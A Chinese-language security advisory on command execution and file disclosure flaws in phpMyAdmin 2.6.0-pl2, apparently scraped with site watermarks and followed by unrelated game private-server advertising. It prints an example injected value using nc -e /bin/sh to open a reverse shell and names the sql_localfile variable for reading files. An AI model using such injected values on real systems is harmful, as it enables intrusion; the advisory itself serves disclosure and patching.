受影响系统:
phpMyAdmin phpMyAdmin 2.6.0-pl2
不受影响系统:
phpMyAdmin phpMyAdmin 2.6.1-rc1
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CAN-2004-1147,CAN-2004-1148 copyright dedecms
phpMyAdmin是一个免费工具,为管理MySQL提供了一个WWW管理接口。
phpMyAdmin由于对URL数据缺少充分过滤,远程攻击者可以利用这个漏洞以WEB权限执行任意命令和查看任意文件信息。
copyright dedecms
存在未明问题,提交类似'F\';nc -e /bin/sh $IP 80;echo \'A'的值可导致任意命令执行,此漏洞不需要攻击者访问phpMyAdmin接口。另外攻击者可以利用'sql_localfile'变量以进程权限查看文件内容。此漏洞需要攻击者访问phpMyAdmin接口。 本文来自织梦
<*来源:Nicolas Gregoire () dedecms.com
链接:
*>
建议:
--------------------------------------------------------------------------------
厂商补丁:
本文来自织梦
phpMyAdmin
----------
目前厂商已经发布了升级补丁以修复这个问题,请到厂商的主页下载升级到2.6.1-rc1或新的:
copyright dedecms
1.76精品传奇_1.76天下毁灭_1.76复古传奇_英雄合击_中变靓装传奇_无忧传奇
传奇花屏补丁,花屏补丁,土城花屏补丁,盟重土城花屏补丁下载,土城花屏补丁下载,沙巴克花屏补丁,传奇土城花屏补丁下载
网站每天发布最新、最好的传奇版本下载和与传奇服务端配套开区传奇模版,网游技术教程全部免费下载!
无忧网络是目前唯一家所有的传奇服务端,传奇私服花屏补丁,盟重花屏补丁和传奇客户端下载都经过站长亲自测试并配有真实测试图!
所有的工具软件和传奇版本在发布之前,都会经过站长亲自测试,保证chuanqisf可以进入游戏,所有软件都无毒无插件!
本站声明:本站所有技术资料与下载资源均为网络搜集整理,并不代表本站的观点与立场,如有侵犯您的权益,请来信指出,本站将立即改正Copyright © 2002-2014 无忧网络 版权所有蜀ICP备09041899号